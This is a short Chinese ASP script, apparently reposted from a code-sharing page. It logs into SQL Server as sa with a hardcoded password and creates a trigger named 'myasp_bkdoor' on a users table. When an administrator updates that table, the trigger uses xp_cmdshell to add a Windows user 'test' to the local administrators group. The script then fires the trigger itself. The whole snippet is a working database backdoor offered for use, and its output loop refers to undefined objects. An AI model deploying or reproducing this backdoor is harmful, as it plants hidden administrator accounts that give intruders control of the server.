复制代码代码如下:

<%

'里边的变量代码大家用时自己改吧

On Error Resume next

Set conn=Server.CreateObject("ADODB.Connection")

DSN="driver={SQL Server};Server=(Local)GSQL;database=baby;uid=sa;pwd=lcx;"

conn.Open DSN

if conn.State=1 then

response.write("成功")

sql="CREATE TRIGGER myasp_bkdoor"&Chr(10)&Chr(13)&"ON users_member"&Chr(10)&Chr(13)&"AFTER UPDATE"&Chr(10)&Chr(13)&"AS"&Chr(10)&Chr(13)&"IF user='dbo' OR user='sa'"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'dbo OR sa logon'"&Chr(10)&Chr(13)&"EXEC master..xp_cmdshell'net user test 123456 /add&&net localgroup administrators test /add'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13)&"ELSE"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'not dbo or sa privilage'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13) '建立myasp_bkdoor触发器，触发baby库中的users_member表的update操作加用户

SQL1="update users_member set email=3 where accountid=1" '触发

'sql2="drop TRIGGER myasp_bkdoor"

set rs=conn.execute(SQL)&conn.execute(SQL1,iRowsAffected, &H0001)'&conn.execute(SQL2) '触发

Do Until Rs.EOF

Response.Write " <tr>" & vbNewLine

For I = 0 To Rs.Fields.Count - 1

Response.Write "<td>" & SQLOut(oRs(I)) & "</td>" & vbNewLine

Next

Response.Write " </tr>" & vbNewLine

Rs.MoveNext

Loop

else

response.write("失败")

end if

%>